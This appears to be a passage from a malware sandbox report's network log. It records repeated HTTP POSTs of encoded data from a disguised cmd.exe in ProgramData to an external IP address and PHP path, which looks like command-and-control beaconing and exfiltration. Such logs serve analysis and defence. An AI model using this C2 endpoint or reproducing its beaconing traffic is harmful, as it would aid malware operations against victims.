Jan 3, 2025 20:47:54.016398907 CET	2560	OUT	Data Raw: 5f 5e 59 5f 5c 44 5a 55 5a 5c 55 51 59 56 54 50 56 5f 5d 48 50 5d 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _^Y_\DZUZ\UQYVTPV_]HP]ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?<3>2!Y1\+<)$&T$-))#-9X7V)-'_!%Y)
Jan 3, 2025 20:47:54.301357031 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:54.428219080 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:54.770334959 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:55.122303963 CET	2560	OUT	Data Raw: 5f 50 59 5f 59 45 5f 52 5a 5c 55 51 59 57 54 55 56 5b 5d 44 50 5d 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _PY_YE_RZ\UQYWTUV[]DP]ZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B( ,3.>%7)X&,0\+=?&U$.>3(96*#<('_!%Y)
Jan 3, 2025 20:47:55.517940998 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:55.661448956 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49761	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:55.796092987 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:56.153820038 CET	2560	OUT	Data Raw: 5f 51 59 59 59 40 5a 51 5a 5c 55 51 59 5c 54 52 56 5c 5d 40 50 50 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _QYYY@ZQZ\UQY\TRV\]@PPZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G(]&>1Y&79Y&,$[+>8?B"1-=W*0(.=\#Q#V+-'_!%Y)/
Jan 3, 2025 20:47:56.444598913 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:56.575614929 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49763	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:56.715717077 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:57.080581903 CET	2560	OUT	Data Raw: 5f 52 59 58 59 42 5a 5b 5a 5c 55 51 59 5c 54 5a 56 51 5d 42 50 50 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _RYXYBZ[Z\UQY\TZVQ]BPPZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?0'\3%2752,7+<$2>6>$.&>7'(-'_!%Y)/
Jan 3, 2025 20:47:57.352978945 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:57.482217073 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49769	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:58.493887901 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1860 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:58.841133118 CET	1860	OUT	Data Raw: 5a 52 5c 53 59 44 5a 52 5a 5c 55 51 59 58 54 50 56 50 5d 40 50 55 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZR\SYDZRZ\UQYXTPVP]@PUZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B+3;_3.!\25X2,?.7+B>$.)=#[.%7<)-'_!%Y)?
Jan 3, 2025 20:47:59.229657888 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:59.360146999 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 25 00 33 26 23 08 24 5e 2f 16 27 2a 31 0b 28 3c 0a 1c 39 32 24 5b 22 04 3f 55 29 55 33 00 2a 01 3f 01 22 3c 35 08 36 2c 2e 01 2b 2a 23 5b 03 1d 21 02 36 31 3a 12 25 5f 31 10 2c 1e 20 43 24 2d 35 13 3c 00 21 18 20 3d 3e 1c 35 07 23 0e 38 33 22 05 24 12 27 5f 28 3d 0c 10 27 15 21 51 00 10 3a 09 24 30 3e 06 27 3f 26 13 32 03 3d 11 33 0b 20 02 22 12 0f 08 26 38 2a 00 2c 22 37 0f 32 22 2b 0b 35 0d 05 05 29 17 08 0c 25 01 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: %3&#$^/'1(<92$["?U)U3?"<56,.+#[!61:%_1, C$-5<! =>5#83"$'_(='!Q:$0>'?&2=3 "&8,"72"+5)%"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49770	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:58.498054028 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:58.856779099 CET	2560	OUT	Data Raw: 5f 50 5c 53 5c 47 5a 51 5a 5c 55 51 59 5f 54 5a 56 5c 5d 48 50 55 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _P\S\GZQZ\UQY_TZV\]HPUZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+ #_3>\''"2/ X<?Q<4=&.(# .%\ $8?'_!%Y)#
Jan 3, 2025 20:47:59.258640051 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49778	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:59.484647989 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:59.841916084 CET	2560	OUT	Data Raw: 5f 53 5c 5a 59 4b 5f 57 5a 5c 55 51 59 5b 54 57 56 5b 5d 47 50 56 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _S\ZYK_WZ\UQY[TWV[]GPVZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B) ,$1]1Q:1 \>=;V<4%2.>U(.=^ <-'_!%Y)3
Jan 3, 2025 20:48:00.343364954 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:00.476895094 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49787	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:01.059067965 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:01.403775930 CET	2560	OUT	Data Raw: 5a 52 5c 59 5c 47 5a 54 5a 5c 55 51 59 56 54 55 56 51 5d 49 50 54 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZR\Y\GZTZ\UQYVTUVQ]IPTZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(303=6&$:&<Z<+()1>)=#<99\#Q;)='_!%Y)
Jan 3, 2025 20:48:01.712651014 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:01.851799965 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49793	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:01.982952118 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:02.341181993 CET	2560	OUT	Data Raw: 5a 53 5c 5c 59 41 5a 52 5a 5c 55 51 59 5b 54 52 56 59 5d 45 50 53 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZS\\YAZRZ\UQY[TRVY]EPSZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)0\'=%[''"2? >-U)79&=9U> :&5_7'((='_!%Y)3
Jan 3, 2025 20:48:02.637207031 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:02.770019054 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49799	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:02.887909889 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:03.451944113 CET	2560	OUT	Data Raw: 5f 57 59 5a 59 4a 5a 57 5a 5c 55 51 59 59 54 54 56 58 5d 43 50 52 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _WYZYJZWZ\UQYYTTVX]CPRZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ '.9&7:2?,[?[?T+&Q2*>U?Y-\"7'V?='_!%Y)
Jan 3, 2025 20:48:03.531498909 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:03.692979097 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49805	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:03.838746071 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:04.185029984 CET	2560	OUT	Data Raw: 5f 5e 5c 5e 5c 43 5a 53 5a 5c 55 51 59 5b 54 50 56 5d 5d 43 50 55 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _^\^\CZSZ\UQY[TPV]]CPUZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%)0<0>*&Y%<'(= ?%2>>Z977/W+'_!%Y)3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49807	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:04.416479111 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1884 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:04.763025999 CET	1884	OUT	Data Raw: 5f 50 5c 5f 59 41 5a 52 5a 5c 55 51 59 5c 54 53 56 5d 5d 42 50 56 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _P\_YAZRZ\UQY\TSV]]BPVZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?00X!]%6%Y+-+<&%-)R) .C94;(-'_!%Y)/
Jan 3, 2025 20:48:05.098258972 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:05.317522049 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:05 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 25 06 25 36 3c 1a 27 28 24 08 30 3a 0c 1b 2b 02 37 09 2e 32 20 5a 35 14 38 0c 3e 0d 38 58 3e 3f 01 04 36 3f 35 09 22 3f 2e 00 2a 2a 23 5b 03 1d 22 12 22 32 39 07 32 39 31 10 2c 30 20 43 24 2d 39 12 28 3e 08 0b 34 3e 22 52 35 3d 3c 1f 38 0d 2d 10 26 3c 27 5f 3f 13 2e 10 33 2f 21 51 00 10 39 55 33 33 17 5e 24 02 3e 5f 31 2d 25 58 27 35 3c 07 21 02 3e 52 25 5e 31 5e 3b 0b 3f 09 25 32 2b 0b 22 33 2b 05 3d 07 2e 0f 32 11 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: %%6<'($0:+7.2 Z58>8X>?6?5"?.*#[""29291,0 C$-9(>4>"R5=<8-&<'_?.3/!Q9U33^$>_1-%X'5<!>R%^1^;?%2+"3+=.2"_ R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49808	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:04.501436949 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:04.856719971 CET	2560	OUT	Data Raw: 5f 52 5c 5c 5c 44 5f 55 5a 5c 55 51 59 58 54 53 56 58 5d 48 50 55 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _R\\\D_UZ\UQYXTSVX]HPUZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%C++Y3"%'%/ ?.4<&$=)R #9%X"4?R+='_!%Y)?
Jan 3, 2025 20:48:05.144799948 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:05.357927084 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49815	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:05.484060049 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:05.841231108 CET	2560	OUT	Data Raw: 5a 52 59 5a 59 43 5a 54 5a 5c 55 51 59 5d 54 5b 56 5b 5d 46 50 54 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZRYZYCZTZ\UQY]T[V[]FPTZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&< $.5]&Q&1Z4Y<?+B:%=/_:9 V?='_!%Y)+
Jan 3, 2025 20:48:06.203528881 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:06.347481966 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49823	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:07.302350044 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
